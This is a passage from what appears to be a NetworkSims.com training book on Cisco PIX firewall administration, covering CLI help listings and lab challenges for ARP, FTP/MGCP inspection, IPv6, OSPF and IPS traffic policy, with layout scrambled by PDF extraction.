[<local>:]<file spec>
DESCRIPTION:
copy
Copy files from and to local and remote file systems
SYNTAX:
<options>
noconfirm - Do not prompt for confirmation

pcap
- Use raw dump of the capture buffer
<local>
Local file system prefix, default assumed if omitted
<file spec>
Name of the file or one of startup-config, running-config
startup-config Configuration file stored in flash
running-config Configuration file stored in memory
<URL>
<scheme>://[<user>:<password>@]<location>[:<port>]/<pathname>[
;<options>]
<scheme>
Remote file system type - TFTP, FTP,
HTTP (not available as target), HTTPS (not available as target)
<user>
User name for logging into server
<location>
The IP address (or name) of the server. Place IPv6 address
within square brackets
<password>
Password for logging into server
<pathname>
The path and filename
<port>
Port of the remote server
<options>
One or more options of the form <option>=<value>, delimited by
';' character. Valid options are:
type=<xx>
int=<interface>
type
Valid only if FTP is used, specifies FTP mode and transfer type
<xx>
Used with type to specify the FTP type. This can be any of
the four combinations ap, an, ip and in, where
a- Ascii transmission mode,
i- Image (binary) transmission mode,
p- Passive mode,
n- Normal or non passive mode
int
Valid only if TFTP is used, specifies the interface used to
perform the remote access
<interface>
Name of the interface, specified using the nameif interface
subcommand
pixfirewall# help cr
USAGE:
[show|clear] crashinfo
crashinfo test
crashinfo force [page-fault|watchdog]
[no] crashinfo save disable
show crashinfo save
DESCRIPTION:
Crashinfo
Read, write and configure crash write to flash. Force a crash.
pixfirewall# help deb
NetworkSims.com
521
USAGE:
no debug all | undebug all
[no] debug aaa [<1-255>]
[no] debug appfw chunk|event|eventverb|regex [<1-255>]
[no] debug arp
[no] debug arp-inspection [<1-255>]
[no] debug cmgr [<1-255>]
[no] debug context [<1-255>]
[no] debug cplane [<1-255>]
[no] debug crypto isakmp [timers [<1-255>]] |
[capture <cap_name> [options]] |
[<1-255>]
[no] debug ctiqbe [<1-255>]
[no] debug ctm [<1-255>]
[no] debug dhcpc detail|error|packet [<1-255>]
[no] debug dhcpd packet|event [<1-255>]
[no] debug dhcprelay error|packet|event [<1-255>]
[no] debug disk file|filesystem|file-verbose [<1-255>]
[no] debug dns [resolver|all [<1-255>]]
[no] debug entity [<1-255>]
[no] debug fixup tcp|udp|onat [<1-255>]
[no] debug fover cable|fail|fmsg|ifc|open|rx|rxdmp|rxip|
switch|sync|tx|txdmp|txip|verify|off
[no] debug fsm [<1-255>]
[no] debug ftp client [<1-255>]
[no] debug generic [<1-255>]
[no] debug h323 h225|h245|ras [asn|event]
[no] debug http [<1-255>]
[no] debug http-map
[no] debug icmp trace [<1-255>]
[no] debug igmp [group [A.B.C.D]|interface [<if_name>]]
[no] debug ils [<1-255>]
[no] debug imagemgr [<1-255>]
[no] debug ipsec-over-tcp [<1-255>]
[no] debug ipv6 icmp|interface|nd|packet|routing
[no] debug iua-proxy [<1-255>]
[no] debug kerberos [<1-255>]
[no] debug ldap [<1-255>]
[no] debug mac-address-table [<1-255>]
[no] debug menu aaa|ipsec-over-tcp|ctm|vpnlb|ike|ipaddrutl|
qos|pki|vpnfo [LINE]
[no] debug mfib db|init|mrib|pak|ps|signal [<group_addr>]
[no] debug mgcp messages|parser|sessions
[no] debug module-boot [<1-255>]
[no] debug mrib client|io|route[<host_name>]|table
[no] debug np drops[breaks acl|all|bad-crypto|bad-ipsec-natt|
bad-ipsec-prot|bad-ipsec-udp|bad-tcp-cksum|bad-tcp-flags|
clear|ctm-error|dst-l2-lookup-fail|flow-expired|fo-standby|
ids-fail-close|ids-request|ifc-classify|inspect-dns|
inspect-icmp|intercept-unexpected|interface-down|
invalid-app-length|invalid-encap|invalid-ethertype|
invalid-ip-addr|invalid-ip-length|invalid-ip-option|
invalid-tcp|invalid-tcp-hlength|invalid-udp-length|
ip-fragment|ipsec-clearpkt-notun|ipsec-ipv6|ipsec-need-sa|
ipsec-spoof|ipsec-tun-down|ipsecudp-keepalive|l2-acl|
l2-same-lan-port|large-buf-alloc-fail|lu-invalid-pkt|
natt-keepalive|no-adjacency|no-mcast-entry|no-mcast-intrf|
no-punt-cb|no-route|np-sp-invalid-spi|queue-removed|
rate-exceeded|rpf-violated|security-failed|send-ctm-error|
show|tcp-acked|tcp-bad-option-len|tcp-bad-option-list|
tcp-bad-sack-allow|tcp-bad-winscale|tcp-buffer-full|
tcp-conn-limit|tcp-data-past-fin|tcp-discarded-ooo|
NetworkSims.com
522
[no] debug
[no] debug
[no] debug
[no] debug
[no] debug
[no] debug
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
<if_name>
<host_name>
<user_name>
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
tcp-dual-open|tcp-mss-exceeded|tcp-mss-no-syn|
tcp-not-syn|tcp-paws-fail|tcp-reserved-set|
tcp-rst-syn-in-win|tcp-syn-data|tcp-synack-data|
tcp-tsopt-notallowed|tcp-winscale-no-syn|
unable-to-add-flow|unable-to-create-flow|
unimplemented|unsupport-ipv6-hdr|
unsupported-ip-version break]
ntdomain [<1-255>]
ntp adjust|authentication|events|loopfilter|
packets|params|select|sync|validity
ospf [adj|database-timer|events|flood|lsa-generation|
packet|retransmission|tree|spf[external|inter|intra]]
parser cache [<1-255>]
asdm history <1-255>
pim [df-election [interface <ifname>] [rp <addr>] |
group <group_addr> | interface <ifname> | neighbor]
[pix process|uauth|cls|pkt2pc|acl[<1-4294967295>]]
pppoe error|packet|event [<1-255>]
pptp [<1-255>]
radius [all|decode|session|user user_name]
rip [<1-255>]
rtsp [<1-255>]
sdi [<1-255>]
sequence [<1-255>]
session-command [<1-255>]
sip [<1-255>]
skinny [<1-255>]
smtp [<1-255>]
sqlnet [<1-255>]
ssh [<1-255>]
ssl cipher|device [<1-255>]
sunrpc [<1-255>]
tacacs [session|user user_name]
tcp-map
timestamps [<1-255>]
vpn-sessiondb [<1-255>]
xdmcp [<1-255>]
Interface name.
Hostname or A.B.C.D IP group address.
User name.
DESCRIPTION:
debug
pixfirewall# help del

USAGE:
delete [/recursive] [/noconfirm] [{disk0:|disk1:|flash:}] <path>
DESCRIPTION:
delete
Delete a file
SYNTAX:
/recursive
Recursive delete
/noconfirm
No confirmation
NetworkSims.com
523
<path>
File to be deleted
pixfirewall# help dir

USAGE:
dir [/all] [/recursive]
[{all-filesystems | [{disk0:|disk1:|flash:}][<path>]}]
DESCRIPTION:
dir
SYNTAX:
/all
List all files
/recursive
List files recursively
all-filesystems
List files on all filesystems
<path>
Directory or file name
pixfirewall# help dis
USAGE:
disable
DESCRIPTION:
disable
pixfirewall# help do
USAGE:
downgrade [/noconfirm] <image_url>
[activation-key (flash|file|<actkey>)]
[config <config_url>]
DESCRIPTION:
downgrade
Downgrade the system image. Unit will reboot with execution

of this command.
SYNTAX:
noconfirm
<image_url>
activation-key
flash
file
<actkey>
config
<config_url>
Do not prompt for confirmation

File name or URL of the image to be downgraded with
Specify the 4-tuple activation key to be used after downgrade
Use the 4-tuple activation key last used in this unit
Use the activation key saved with the image file (<image_url>)
during upgrade
Specify the 4-tuple activation key in the command line
Specify the startup configuration file to be used after
downgrade
File name or URL of the configuration
Notes: The default for activation-key is to use the 4-tuple key in flash.
The default for config is to use the file downgrade.cfg in flash.
pixfirewall#
help er
USAGE:
NetworkSims.com
524
erase {disk0:|disk1:|flash:}
DESCRIPTION:
erase
SYNTAX:
{disk0:|disk1:|flash:}
Filesystem to be formatted
pixfirewall# help ex
USAGE:
quit|exit
DESCRIPTION:
quit
Disable, end configuration or logout
pixfirewall# help f?
format
fsck
pixfirewall# help fo
USAGE:
format {disk0:|disk1:|flash:}
DESCRIPTION:
format
Format filesystem
SYNTAX:
{disk0:|disk1:|flash:}
Filesystem to be formatted
pixfirewall# help fs
USAGE:
fsck [/nocrc] flash:
DESCRIPTION:
fsck
Perform file system check
SYNTAX:
nocrc
Skip the CRC checks during FSCK
pixfirewall# help kill

USAGE:
kill <telnet_id>
DESCRIPTION:
kill
SYNTAX:
NetworkSims.com
525
<telnet_id>
Session ID as displayed by the who command
see also:
who
pixfirewall# help logging
USAGE:
logging savelog [<logfile>]
clear logging [asdm | buffer]
show logging [{message [<syslog_id>|all]} | asdm | queue | setting]
DESCRIPTION:
logging
Configure, show or clear logging command options or

operational data
SYNTAX:
savelog
<logfile>
disable
level
message
queue
rate-limit
see also:
save logging buffer to flash

optional log file name on flash
disabled syslog message
syslog message with modified level
display which messages are suppressed
show syslog queue
show rate-limit info (FWSM only)
logging buffered <level>, logging queue <queue_size>
pixfirewall# help logout

USAGE:
logout
DESCRIPTION:
logout
pixfirewall#

help mem
USAGE:
show memory [detail]
[no] memory delayed-free-poisoner enable
memory delayed-free-poisoner validate
[clear|show] memory delayed-free-poisoner
DESCRIPTION:
memory
System memory utilization and diagnostic tools
SYNTAX:
detail
Indicate the amount of total, free, used, reserved, least

free, most used, fragmented and allocated memory statistics.
By default, only the total, free, and used memory is emitted.
delayed-free-poisoner
enable
validate
diagnose illegal memory use

enable the tool
ensure the cached memory is still valid
The delayed-free-poisoner is a tool for finding illegal reuse
NetworkSims.com
526
of system memory. This tool, which is not enabled by default,

helps find memory corruptions by a combination of steps including:
setting memory returned to the system by the apps to poisoned
values, deferring reuse of such poisoned memory for as long as
possible by storing this memory within the tool, and finally
ensuring the poisoned values, while they are stored in the tool,
have not been unexpectedly modified.
The use of the delayed-free-poisoner has significant impact
upon the observed system memory use, processor cycles, internal
memory bus bandwidth, and if issues are found, uptime. The tool's
primary audience is development or testing environments having
suitable expectation and tolerance for the types of behaviors
the previous concerns imply; use in live or production networks
is not recommended.
pixfirewall# help mk
USAGE:
mkdir /noconfirm [{disk0:|disk1:|flash:}] <path>
DESCRIPTION:
mkdir
SYNTAX:
/noconfirm
No confirmation
<path>
Directory name
pixfirewall# help more
USAGE:
more [/ascii] || [/binary] || [/ebcdic] [filesystem] <path>
DESCRIPTION:
more
SYNTAX:
/ascii
/binary
/ebcdic
[filesystem]
<path>
pixfirewall#
Display binary files in ascii

Force display to hex/text format
Force display to ebcdic format
Optional parameter that can be disk0: or disk1: or
flash: or ftp: or http: or https: or system: or tftp:
File to display
help os
USAGE:
show ospf [<pid> [<ip_addr>]]...
...interface [<interface>]
...neighbor [detail] [<interface>] [<nbr-router-id>]
...[summary-address]
...database [router | network | summary |
asbr-summary | external | nssa-external]
[<ip_addr>] [internal]
[self-originate | adv-router <ip_addr>]
NetworkSims.com
527
...database database-summary
...request-list <nbr-router-id> <interface>
...flood-list <interface>
...retransmission-list <nbr-router-id> <interface>
...border-routers
...virtual-links
clear ospf [<pid>]
...process
...counters [neighbor [<nbr-interface>] [<nbr-id>]]
DESCRIPTION:
ospf
Show or clear OSPF information
SYNTAX:
<pid>
OSPF process ID
<nbr-router-id> Neighbor router address
<interface>
Interface name as specified by nameif
pixfirewall# help per
USAGE:
perfmon interval <seconds>
perfmon quiet | verbose
perfmon settings
DESCRIPTION:
perfmon
Display perfmon stats or change options
SYNTAX:
show perfmon
Shows current and running average of a set of rates,

xlate/sec, conn/sec, websense query/sec, url/sec, etc.
<seconds>
Sets the interval used to calculate the current rate

(the default is 120 seconds).
verbose
Rather than have to type "show perfmon" over and over,

you can use perfmon verbose to automatically print
the stats to the console every interval seconds.
quiet
Turn verbose mode OFF.
settings
Show current interval and verbose/quiet settings.
pixfirewall# help ping

USAGE:
ping [if_name] <host> [data <pattern>] [repeat <count>] [size <bytes>]
[timeout <seconds>] [validate]
DESCRIPTION:
ping
SYNTAX:
[if_name]
NetworkSims.com
528
by which <host> is accessible. If not supplied, then <host>

is resolved to an IP address and then the routing table
is consulted to determine the destination interface.
<host>
IPv4 address, IPv6 address or name of host to ping.
<pattern>
16 bit data pattern in hex.
<count>
Repeat count.
<bytes>
Datagram size in bytes.
<seconds>
Timeout in seconds.
validate
Validate reply data.
pixfirewall# help pwd
USAGE:
pwd
DESCRIPTION:
pwd
pixfirewall# help rel

USAGE:
reload [quick] [noconfirm] [save-config] [max-hold-time [hhh:]mm]
[{in [hhh:]mm | at hh:mm [{Mon dd | dd Mon}] }] [reason <text>]
reload cancel
DESCRIPTION:
reload
SYNTAX:
quick
noconfirm
save-config
max-hold-time
at
in
reason
Reload without properly shutting down each subsystem

Reload immediately without asking for confirmation
Save configuration before reload
Maximum hold time for orderly reload
Reload at a specific time/date
Reload after a time interval
Reason for reload
pixfirewall# help rena

USAGE:
rename
/noconfirm
[{disk0:|disk1:|flash:}]
[{disk0:|disk1:|flash:}] <destination path>
<source
path>
DESCRIPTION:
rename
Rename a file
SYNTAX:
/noconfirm
No confirmation
<source path>
Source file path
NetworkSims.com
529
pixfirewall# help res

USAGE:
show resource usage
[resource {<resource_name>|all}]
[counter <counter_name> [<count_threshold>]]
clear resource usage
[resource {<resource_name>|all}]
show resource types
DESCRIPTION:
resource
Display/clear system resource usage
SYNTAX:
Where:
<resource_name>
<counter_name>
<count_threshold>
Default command: 'show resource
See 'show resource types' for resource names

One of: current, peak, all
Only view counters at or above this threshold
usage resource all counter all 1'
pixfirewall# help rm
USAGE:
rmdir /noconfirm [{disk0:|disk1:|flash:}] <path>
DESCRIPTION:
rmdir
SYNTAX:
/noconfirm
No confirmation
<path>
Directory name
pixfirewall# help sh
USAGE:
shun <src_ip> [<dst_ip> <sport> <dport> [<prot>]] [vlan <vlan_number>]
no shun <src_ip> [vlan <vlan_number>]
show shun [<src_ip>|statistics]
clear shun [statistics]
DESCRIPTION:
shun
SYNTAX:
src_ip the
dst_ip the
sport
the
dport
the
prot
the
vlan_number
pixfirewall#
IP src address of a mischievous host.

IP dest. address used for connection lookup and termination.
source port for connection lookup and termination.
dest. port for connection lookup and termination.
protocol for connection lookup and termination.
the vlan on which the mischievous host resides.
help ter
NetworkSims.com
530
USAGE:
terminal monitor
terminal no monitor
[no] terminal pager [lines <lines>]
DESCRIPTION:
terminal
Set and reset terminal monitor or pagination
SYNTAX:
lines
number of lines per page
pixfirewall# help tra
USAGE:
show traffic
clear traffic
DESCRIPTION:
traffic
pixfirewall# help u?
undebug
pixfirewall# help unde
USAGE:
no debug all | undebug all
[no] debug aaa [<1-255>]
[no] debug appfw chunk|event|eventverb|regex [<1-255>]
[no] debug arp
[no] debug arp-inspection [<1-255>]
[no] debug cmgr [<1-255>]
[no] debug context [<1-255>]
[no] debug cplane [<1-255>]
[no] debug crypto isakmp [timers [<1-255>]] |
[capture <cap_name> [options]] |
[<1-255>]
[no] debug ctiqbe [<1-255>]
[no] debug ctm [<1-255>]
[no] debug dhcpc detail|error|packet [<1-255>]
[no] debug dhcpd packet|event [<1-255>]
[no] debug dhcprelay error|packet|event [<1-255>]
[no] debug disk file|filesystem|file-verbose [<1-255>]
[no] debug dns [resolver|all [<1-255>]]
[no] debug entity [<1-255>]
[no] debug fixup tcp|udp|onat [<1-255>]
[no] debug fover cable|fail|fmsg|ifc|open|rx|rxdmp|rxip|
switch|sync|tx|txdmp|txip|verify|off
[no] debug fsm [<1-255>]
[no] debug ftp client [<1-255>]
[no] debug generic [<1-255>]
[no] debug h323 h225|h245|ras [asn|event]
[no] debug http [<1-255>]
[no] debug http-map
[no] debug icmp trace [<1-255>]
[no] debug igmp [group [A.B.C.D]|interface [<if_name>]]
[no] debug ils [<1-255>]
[no] debug imagemgr [<1-255>]
NetworkSims.com
531
[no]
[no]
[no]
[no]
[no]
[no]
[no]
debug
debug
debug
debug
debug
debug
debug
[no]
[no]
[no]
[no]
[no]
debug
debug
debug
debug
debug
[no] debug
[no] debug
[no] debug
[no] debug
[no] debug
[no] debug
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
NetworkSims.com
ipsec-over-tcp [<1-255>]
ipv6 icmp|interface|nd|packet|routing
iua-proxy [<1-255>]
kerberos [<1-255>]
ldap [<1-255>]
mac-address-table [<1-255>]
menu aaa|ipsec-over-tcp|ctm|vpnlb|ike|ipaddrutl|
qos|pki|vpnfo [LINE]
mfib db|init|mrib|pak|ps|signal [<group_addr>]
mgcp messages|parser|sessions
module-boot [<1-255>]
mrib client|io|route[<host_name>]|table
np drops[breaks acl|all|bad-crypto|bad-ipsec-natt|
bad-ipsec-prot|bad-ipsec-udp|bad-tcp-cksum|bad-tcp-flags|
clear|ctm-error|dst-l2-lookup-fail|flow-expired|fo-standby|
ids-fail-close|ids-request|ifc-classify|inspect-dns|
inspect-icmp|intercept-unexpected|interface-down|
invalid-app-length|invalid-encap|invalid-ethertype|
invalid-ip-addr|invalid-ip-length|invalid-ip-option|
invalid-tcp|invalid-tcp-hlength|invalid-udp-length|
ip-fragment|ipsec-clearpkt-notun|ipsec-ipv6|ipsec-need-sa|
ipsec-spoof|ipsec-tun-down|ipsecudp-keepalive|l2-acl|
l2-same-lan-port|large-buf-alloc-fail|lu-invalid-pkt|
natt-keepalive|no-adjacency|no-mcast-entry|no-mcast-intrf|
no-punt-cb|no-route|np-sp-invalid-spi|queue-removed|
rate-exceeded|rpf-violated|security-failed|send-ctm-error|
show|tcp-acked|tcp-bad-option-len|tcp-bad-option-list|
tcp-bad-sack-allow|tcp-bad-winscale|tcp-buffer-full|
tcp-conn-limit|tcp-data-past-fin|tcp-discarded-ooo|
tcp-dual-open|tcp-mss-exceeded|tcp-mss-no-syn|
tcp-not-syn|tcp-paws-fail|tcp-reserved-set|
tcp-rst-syn-in-win|tcp-syn-data|tcp-synack-data|
tcp-tsopt-notallowed|tcp-winscale-no-syn|
unable-to-add-flow|unable-to-create-flow|
unimplemented|unsupport-ipv6-hdr|
unsupported-ip-version break]
ntdomain [<1-255>]
ntp adjust|authentication|events|loopfilter|
packets|params|select|sync|validity
ospf [adj|database-timer|events|flood|lsa-generation|
packet|retransmission|tree|spf[external|inter|intra]]
parser cache [<1-255>]
asdm history <1-255>
pim [df-election [interface <ifname>] [rp <addr>] |
group <group_addr> | interface <ifname> | neighbor]
[pix process|uauth|cls|pkt2pc|acl[<1-4294967295>]]
pppoe error|packet|event [<1-255>]
pptp [<1-255>]
radius [all|decode|session|user user_name]
rip [<1-255>]
rtsp [<1-255>]
sdi [<1-255>]
sequence [<1-255>]
session-command [<1-255>]
sip [<1-255>]
skinny [<1-255>]
smtp [<1-255>]
sqlnet [<1-255>]
ssh [<1-255>]
ssl cipher|device [<1-255>]
sunrpc [<1-255>]
tacacs [session|user user_name]
tcp-map
532
[no] debug timestamps [<1-255>]

[no] debug vpn-sessiondb [<1-255>]
[no] debug xdmcp [<1-255>]
<if_name>
<host_name>
<user_name>
Interface name.
Hostname or A.B.C.D IP group address.
User name.
DESCRIPTION:
debug
pixfirewall# help who

USAGE:
who [ip]
DESCRIPTION:
who
Show active administration sessions on the device
pixfirewall# help wr
USAGE:
write erase|terminal|standby
write net [<tftp_ip>]:<filename>
write [memory]
DESCRIPTION:
write
Write config to net, flash, or terminal, or erase flash.

Write without argument defaults to write memory
SYNTAX:
erase
Clears the flash memory configuration
terminal
Display the current active configuration, not necessarily

the saved configuration
mem
Save the active configuration to the flash, so that it will

be the active configuration after a reload
standby
Save the active configuration on the active unit to the

flash on the standby unit
net
Save the active configuration to the tftp server
see also:
configure
<tftp_ip>
IP address of the tftp server. Place IPv6 address

within square brackets.
<filename>
Name of the configuration file.

Outline
NetworkSims.com
533
This challenge involves configuring ARP entries.

Objectives
Define a static ARP entry
Example
pixfirewall# sh nameif
Interface
Name
Ethernet0
outside
Ethernet1
inside
Ethernet2
inf2
pixfirewall# config t
pixfirewall(config)# help arp
Security
0
100
50
USAGE:
[no] arp <if_name> <ip> <mac> [alias]
[no] arp timeout <seconds>
show arp [statistics]
clear arp [statistics]
show running-config [all] arp [timeout]
clear configure arp
DESCRIPTION:
arp
Change or view the ARP table, add or delete static ARP entries,
set or clear the ARP timeout value and clear ARP statistics
SYNTAX:
<if_name>
The interface name whose arp table will be changed or viewed
<ip>
IP address for an arp table entry
<mac>
Hardware 6 byte MAC address specified as XX:XX:XX:XX:XX:XX

or XXXX.XXXX.XXXX
alias
Proxy ARP for this static entry
<seconds>
Duration for which the dynamic ARP entries will remain

in the table
statistics
Statistics of the arp module
pixfirewall(config)# arp outside ?

Hostname or A.B.C.D IP address for an ARP table entry
pixfirewall(config)# arp outside 10.0.0.1 ?
H.H.H Hardware MAC address
pixfirewall(config)# arp outside 10.0.0.1 1.2.3 ?
NetworkSims.com
534

alias Don't expire this ARP entry after timeout
<cr>
pixfirewall(config)# arp outside 10.0.0.1 1.2.3
pixfirewall(config)# arp inside 11.0.0.1 f.2.4
pixfirewall(config)# arp inf2 13.0.0.1 1.2.5

Outline
This challenge involves configuring FTP and MGCP inspection.
Objectives
Define FTP and MGCP inspection.
Example
pixfirewall(config)# ftp-map ftpm
pixfirewall(config-ftp-map)# ?
Ftp-map configuration commands:
mask-syst-reply Mask reply to syst command
no
request-command FTP request command inspection
pixfirewall(config-ftp-map)# mask- ?
ftp-map mode commands/options:
<cr>
pixfirewall(config-ftp-map)# re ?
deny Specify FTP request commands to block
pixfirewall(config-ftp-map)# re den ?
appe Append to a file
cdup Change to parent of current directory
dele Delete a file at server site
get
FTP client command for the retr command - retrieve a file
help Help information from server
mkd
Create a directory
put
FTP client command for the stor command - store a file
rmd
Remove a directory
rnfr Rename from
rnto Rename to
site Specify server specific command
stou Store a file with a unique name
pixfirewall(config-ftp-map)# exit
pixfirewall(config)# mgcp-map mmap
pixfirewall(config-mgcp-map)# ?
NetworkSims.com
535
mgcp-map configuration commands:

call-agent
Add a Call-Agent
command-queue Configure Command Queue
gateway
Add a Gateway
help
Help for mgcp-map configuration commands
no
pixfirewall(config-mgcp-map)# call ?
mgcp-map mode commands/options:
A.B.C.D IP address
pixfirewall(config-mgcp-map)# gat ?
A.B.C.D IP address

Outline
This challenge involves configuring IPv6.
Objectives
Define IPv6 on E0.

Define IPv6 neighbor discovery to learn about neighboring devices.
Define a static IPv6 mapping (if the automated discovery does not work).
Commands
pixfirewall(config)# int e0
pixfirewall(config-if)# ipv6 address autoconfig
pixfirewall(config-if)# ipv6 enable
pixfirewall(config-if)# exit
pixfirewall(config-if)# ipv6 address 2001:400:3:1::1/64
pixfirewall(config-if)# ipv6 nd ns-interval 100
pixfirewall(config-if)# ipv6 nd ra-interval 100
pixfirewall(config-if)# ipv6 nd reachable-time 100
pixfirewall(config-if)# ipv6 nd prefix 0800::/64
pixfirewall(config)# ipv6 route outside ::/0 2001:400:3:1::1
pixfirewall(config)# ipv6 neighbor fe80:0000 inside 0000.1111.22222
pixfirewall# sh ipv interface
pixfirewall# sh ipv6 route
Example
pixfirewall(config)#
NetworkSims.com
int e0
536
pixfirewall(config-if)# ipv6 ?
interface mode commands/options:
IPv6 interface subcommands:
address Configure IPv6 address on interface
enable
Enable IPv6 on interface
nd
IPv6 interface Neighbor Discovery subcommands
access-list Configure access policy for IPv6 traffic through the system
icmp
Configure access rules for ICMPv6 traffic terminating at an
interface
neighbor
Neighbor
route
Configure IPv6 routes
pixfirewall(config-if)# ipv6 address ?
Hostname or X:X:X:X::X IPv6 link-local address
X:X:X:X::X/<0-128>
IPv6 prefix
autoconfig
Obtain address using autoconfiguration
WORD Access list identifier
pixfirewall(config-if)# ipv6 address autoconfig
pixfirewall(config-if)# ipv6 address 2001:400:3:1::1/64
pixfirewall(config-if)# ipv6 nd ?
dad
Duplicate Address Detection
ns-interval
Set advertised NS retransmission interval
prefix
Configure IPv6 Routing Prefix Advertisement
ra-interval
Set IPv6 Router Advertisement Interval
ra-lifetime
Set IPv6 Router Advertisement Lifetime
reachable-time Set advertised reachability time
suppress-ra
Suppress IPv6 Router Advertisements
pixfirewall(config-if)# ipv6 nd ns-interval ?
<1000-3600000> Retransmission interval in milliseconds
pixfirewall(config-if)# ipv6 nd p ?
X:X:X:X::X/<0-128> IPv6 prefix x:x::y/<z>
default
Specify prefix default parameters
pixfirewall(config-if)# ipv6 nd ra-interval ?
<3-1800> RA Interval (sec)
msec
Interval in milliseconds
NetworkSims.com
537
pixfirewall(config-if)# ipv6 nd reachable-time ?

<0-3600000> Reachability time in milliseconds
pixfirewall(config-if)# ipv6 nd reachable-time 100
pixfirewall(config-if)#
exit
pixfirewall(config)# ipv ?
icmp
interface
neighbor
Neighbor
route
pixfirewall(config)# ipv route ?
Inf2
Inside
Outside Name of interface Ethernet0
pixfirewall(config)# ipv r outside ?
X:X:X:X::X/<0-128> IPv6 prefix
pixfirewall(config)# ipv r outside ::/0 ?
Hostname or X:X:X:X::X IPv6 name or address
pixfirewall(config)# ipv6 route outside ::/0 2001:400:3:1::1
To define a static entry, if discovery does not work:

pixfirewall(config)# ipv6 ?
icmp
interface
neighbor
Neighbor
route
pixfirewall(config)# ipv6 neighbor ?
X:X:X:X::X IPv6 address
pixfirewall(config)# ipv6 neighbor fe80:0000 ?
Inf2 Name of interface Ethernet2
NetworkSims.com
538

Inside Name of interface Ethernet0
pixfirewall(config)# ipv6 neighbor fe80:0000 inside 0000.1111.22222
pixfirewall(config)# exit
pixfirewall# sh ipv6 ?
access-list
icmp
interface
neighbor
route
routers
traffic
Show
Show
IPv6
Show
Show
Show
IPv6
hit counters for access policies

ICMPv6 access rules configured on all interfaces
interface status and configuration
IPv6 neighbor cache entries
IPv6 routes
local IPv6 routers
traffic statistics
pixfirewall# sh ipv interface

outside is administratively down, line protocol is down
IPv6 is enabled, link-local address is fe80::20d:65ff:fe85:77d9 [TENTATIVE]
No global unicast address is configured
Joined group address(es):
ff02::1
ff02::2
ff02::1:ff85:77d9
ICMP error messages limited to one every 100 milliseconds
ICMP redirects are enabled
ND DAD is enabled, number of DAD attempts: 1
ND reachable time is 30000 milliseconds
ND advertised reachable time is 0 milliseconds
ND advertised retransmit interval is 1000 milliseconds
ND router advertisements are sent every 200 seconds
ND router advertisements live for 1800 seconds
Hosts use stateless autoconfig for addresses.
inside is administratively down, line protocol is down
IPv6 is enabled, link-local address is fe80::20d:65ff:fe85:77da [TENTATIVE]
Global unicast address(es):
2001:400:3:1::1, subnet is 2001:400:3:1::/64 [TENTATIVE]
ff02::1
ff02::2
ff02::1:ff85:77da
pixfirewall#
sh ipv6 route
IPv6 Routing Table - 2 entries

Codes: C - Connected, L - Local, S - Static, R - RIP, B - BGP
U - Per-user Static route
I1 - ISIS L1, I2 - ISIS L2, IA - ISIS interarea
O - OSPF intra, OI - OSPF inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2
L
fe80::/10 [0/0]
via ::, outside
NetworkSims.com
539
via ::,
via ::,
ff00::/8
via ::,
via ::,
via ::,
inside
inf2
[0/0]
outside
inside
inf2

Outline
This challenge involves configuring OSPF routing
Objectives
Define OSPF.
Example
pixfirewall(config)# router ?
ospf Open Shortest Path First (OSPF)
pixfirewall(config)# router ospf ?
pixfirewall(config)# router os ?
pixfirewall(config)# router ospf 111
pixfirewall(config-router)# ?
area
compatible
distance
exit
Exit from router configuration mode
help
Interactive help for router subcommands
ignore
log-adj-changes
Log changes in adjacency state
neighbor
network
Add/remove interfaces to/from OSPF routing process
no
Negate a command
redistribute
Redistribute information from another routing process
router-id
summary-address
timers
pixfirewall(config-router)# net ?
router mode commands/options:
A.B.C.D Network address
pixfirewall(config-router)# net 10.0.0.0 ?
NetworkSims.com
540

A.B.C.D Mask for network address
pixfirewall(config-router)# net 10.0.0.0 0.0.0.255 ?
area Set the OSPF area ID
pixfirewall(config-router)# net 10.0.0.0 0.0.0.255 area ?
A.B.C.D
pixfirewall(config-router)# network 10.0.0.0 0.0.0.255 area 1
pixfirewall(config-router)# area ?
A.B.C.D
pixfirewall(config-router)# area 1 ?
default-cost
filter-list
Filter networks between OSPF areas
nssa
Specify a NSSA area
range
Summarize routes matching address/mask (border routers only)
stub
Specify a stub area
virtual-link
<cr>
pixfirewall(config-router)# area 1 authentication
pixfirewall(config-router)# exit
pixfirewall(config-if)# ospf ?
authentication
authentication-key
cost
Interface cost
database-filter
dead-interval
hello-interval
message-digest-key
mtu-ignore
network
Network type
priority
Router priority
advertisements
transmit-delay
pixfirewall(config-if)# ospf authentication ?
null
Use no authentication
<cr>
pixfirewall(config-if)# ospf authentication message-digest
pixfirewall# sh ospf
Routing Process "ospf 1" with ID 10.0.0.0 and Domain ID 0.0.0.255
Supports only single TOS(TOS0) routes
Does not support opaque LSA
NetworkSims.com
541
SPF schedule delay 5 secs, Hold time between two SPFs 10 secs
Minimum LSA interval 5 secs. Minimum LSA arrival 1 secs
Number of external LSA 0. Checksum Sum 0x
0
Number of opaque AS LSA 0. Checksum Sum 0x
0
Number of DCbitless external and opaque AS LSA 0
Number of DoNotAge external and opaque AS LSA 0
Number of areas in this router is 1. 1 normal 0 stub 0 nssa
External flood list length 0
Area 1
Number of interfaces in this area is 1
Area has no authentication
SPF algorithm executed 1 times
Area ranges are
Number of LSA 1. Checksum Sum 0x ff12
Number of opaque link LSA 0. Checksum Sum 0x
0
Number of DCbitless LSA 0
Number of indication LSA 0
Number of DoNotAge LSA 0
Flood list length 0

Outline
This challenge involves diverting all the traffic to the AIP SSM in promiscuous mode. If the
AIP SSM cards then fails, all the traffic will be blocked.
Objectives
Define the class-map.

Define the policy-map.
Apply the policy-map.
Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# ?
MPF class-map configuration commands:
description Specify class-map description
exit
Exit from MPF class-map configuration mode
help
Help for MPF class-map configuration commands
match
Configure classification criteria
no
rename
pixfirewall(config-cmap)# match ?
mpf-class-map mode commands/options:
access-list
Match an Access List
any
Match any packet
default-inspection-traffic Match default inspection traffic:
ctiqbe----tcp--2748
dns-------udp--53
NetworkSims.com
542
ftp-------tcp--21
h323-h225-tcp--1720
